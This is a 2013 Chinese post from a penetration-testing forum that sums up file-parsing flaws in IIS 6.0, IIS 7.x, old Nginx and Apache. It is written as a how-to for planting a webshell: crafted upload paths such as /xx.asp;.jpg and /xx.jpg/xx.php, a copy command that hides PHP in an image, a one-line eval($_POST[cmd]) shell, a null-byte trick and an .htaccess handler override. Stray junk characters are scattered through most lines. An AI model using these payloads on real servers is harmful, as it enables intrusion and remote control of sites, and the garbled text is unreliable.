中国网络渗透测试联盟

标题: 常见服务器解析漏洞总结 [打印本页]
作者: admin    时间: 2013-4-19 19:14
标题: 常见服务器解析漏洞总结
Author : laterain
- r; Q( X  y/ }1 X1 e% N* Z[+]IIS6.0# \7 O4 ]: y; I% E$ P

$ d; \: Z8 D: X8 l( ?目录解析:/xx.asp/xx.jpg 6 I# v) _6 ?( C& r1 [
xx.jpg 可替换为任意文本文件(e.g. xx.txt),文本内容为后门代码! |% i, {! {7 n
IIS6.0 会将 xx.jpg 解析为 asp 文件。
& G( {# x) j% f  p后缀解析:/xx.asp;.jpg     
6 W' \) v) o# G& Q+ u. ] IIS6.0 都会把此类后缀文件成功解析为 asp 文件。
3 o! B$ f1 b$ B# ^2 z& [9 }默认解析:/xx.asa
: s  L4 r8 V  e- b. w0 _         /xx.cer
" X2 }* ~6 `8 y         /xx.cdx- S% j' A; l* O
IIS6.0 默认的可执行文件除了 asp 还包含这三种0 ^6 |; I: W, A- R8 I
此处可联系利用目录解析漏洞
* L- I* u) u. t6 `/xx.asa/xx.jpg 或 /xx.cer/xx.jpg 或 xx.asa;.jpg. Q7 l* c& m3 ~2 b1 h6 R  `3 ]6 A' l
[+]IIS 7.0/IIS 7.5/Nginx <0.8.03( X7 x; K' S8 g

% z4 T, M3 h( f! I* P IIS 7.0/IIS 7.5/Nginx <0.8.03
+ ]6 e% @4 [8 q1 q4 w1 x  g) b 在默认Fast-CGI开启状况下,在一个文件路径(/xx.jpg)后面
9 D# z4 k" h' d" G1 i" v 加上/xx.php,会将 /xx.jpg/xx.php 解析为 php 文件。0 o4 g% h8 C) d( s2 m- u3 U" b
常用利用方法:
" c2 Q$ i2 r) n  c) {1 H 将一张图和一个写入后门代码的文本文件合并将恶意文本% l; ?3 T. W( Y+ Z
写入图片的二进制代码之后,避免破坏图片文件头和尾, T( \+ J) z: q7 D0 z' u: ^
如:7 Y$ I7 G8 r. F. E5 F4 J. D; F
copy xx.jpg /b + yy.txt/a xy.jpg* F) h6 ^9 H9 d$ x
#########################################################, L3 R: {8 L! n1 A7 i
/b 即二进制[binary]模式, @6 z" K( r; y* B
/a 即ascii模式
: j9 y  h9 F. I' D$ C6 x" X1 E xx.jpg 正常图片文件: n: V1 V  j( W2 z
yy.txt 内容 <?PHP fputs(fopen('shell.php','w'),& a' Q6 T9 V" q  j  Y4 p$ z
'<?php eval($_POST[cmd])?>');?>4 C+ j$ [2 E5 S2 y& n
意思为写入一个内容为 <?php eval($_POST[cmd])?> 名称5 d/ {4 }8 o, J7 V( `9 J6 B" j7 a
为shell.php的文件1 D, k7 b2 d" k! s8 L
###########################################################
  w  g1 f- U1 h1 x6 K0 C; i6 ? 找个地方上传 xy.jpg ,然后找到 xy.jpg 的地址,在地址后加上 /xx.php
/ V2 [+ v2 j! x, O 即可执行恶意文本。然后就在图片目录下生成一句话木马 shell.php
% y2 a9 M) G, w) x1 |- t 密码 cmd4 b' C) M$ T( j# V6 \
[+]Nginx <0.8.03
+ w. |; |3 v; n% ^$ X* D0 X
7 Y! q$ f' v9 T4 u- K$ N 在Fast-CGI关闭的情况下,Nginx <0.8.03依然存在解析漏洞
+ o' k. t1 u1 M. k5 ~, A* M- g# T 在一个文件路径(/xx.jpg)后面加上%00.php# Z/ _$ F8 g' R
会将 /xx.jpg%00.php 解析为 php 文件。, X. i1 O, ~6 v" ^, @! N
[+]Apache<0.8.03
2 @+ G& ^, f$ ?& I# {
: Y. k" i, B& A7 _ 后缀解析:test.php.x1.x2.x3* t7 s8 Y# Y. w! ?+ H2 r) L" h. y
Apache将从右至左开始判断后缀,若x3非可识别后缀,5 R) l# u+ C3 v# H
再判断x2,直到找到可识别后缀为止,然后将该可识别% U  W: H' ^9 \5 ^* |2 o6 n  P
后缀进解析test.php.x1.x2.x3 则会被解析为php
* v! j) g: @2 k 经验之谈:php|php3|phtml 多可被Apache解析。5 a- `0 f0 T8 q
[+]其他一些可利用的
$ P# P5 Y. L2 a# J- E + p  m- {9 j8 r: E+ J4 g& V& _2 O5 g
在windows环境下,xx.jpg[空格] 或xx.jpg. 这两类文件都是不允许存在的; k- g9 I& S- k5 T: l! v
若这样命名,windows会默认除去空格或点,这也是可以被利用的!
' C$ X8 L2 ]) w3 j在向一台windows主机上传数据时,你可以抓包修改文件名,在后面加个空格
, M1 i7 O& B2 m% V( I* m或点,试图绕过黑名单,若上传成功,最后的点或空格都会被消除,这样就可( c0 v3 J5 Y  G! c7 X3 ~( l' C- L8 K
得到shell。我记得Fck Php 2.6就存在加空格绕过的漏洞。
; u3 ^. n+ n6 N( ^0 y  x{Linux主机中不行,Linux允许这类文件存在}6 O0 g# O: v! Z; l! Y2 T# z3 P$ e4 {- N
如果在Apache中.htaccess可被执行(默认不执行,这是90sec里的一位朋友说
. a3 e" M  g6 h1 Y8 I9 n的,当初我并不知道),且可以被上传,那可以尝试在
3 C4 E5 q# J1 N7 G" t7 P.htaccess中写入:. h8 w+ n- W5 W  `
<FilesMatch “shell.jpg”> " P7 _8 i' n# r5 I8 }) K! ]
SetHandler application/x-httpd-php
& j6 l: H0 H9 I$ c% s6 ]; _' B4 i</FilesMatch>: e# Q8 u5 L  T5 x" C% v1 |8 J$ ]+ h
shell.jpg换成你上传的文件,这样shell.jpg就可解析为php文件7 w- o8 S! L4 h. s% r3 m6 k% j6 D
[+]错误修改
$ p, ~5 X- [2 o; C7 \
3 f, Y/ |  ^% `$ g7 `, I在 IIS 6.0 下可解析 /xx.asp:.jpg
3 z! n4 y! s2 R/ d! M6 }{/xx.asp:.jpg 此类文件在Windows下不允许存在,:.jpg被自动除去: y# ]5 i! F- K5 t3 S( M
剩下/xx.asp}修改:
& {, g& a- R7 z2 o  Y+ r9 K( `先谢谢核攻击的提醒- i/ K7 h( a1 P. Q/ N# O. x3 x; \
当上传一个/xx.asp:.jpg文件时,的确:.jpg会消失,但是现在的/xx.asp/ |5 V  i* X- M  t6 }3 F
里是没有任何内容的,因为。。不好解释 大家自己看
/ F) c) z2 G2 `9 t! mhttp://lcx.cc/?i=2448
5 G) I: H0 s; t/ Y# F2 M" Lhttp://baike.baidu.com/view/3619593.htm8 E! }: H$ h; T' \2 s6 L/ z
( z( J7 R5 g3 a) L6 f5 i2 S. ?




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2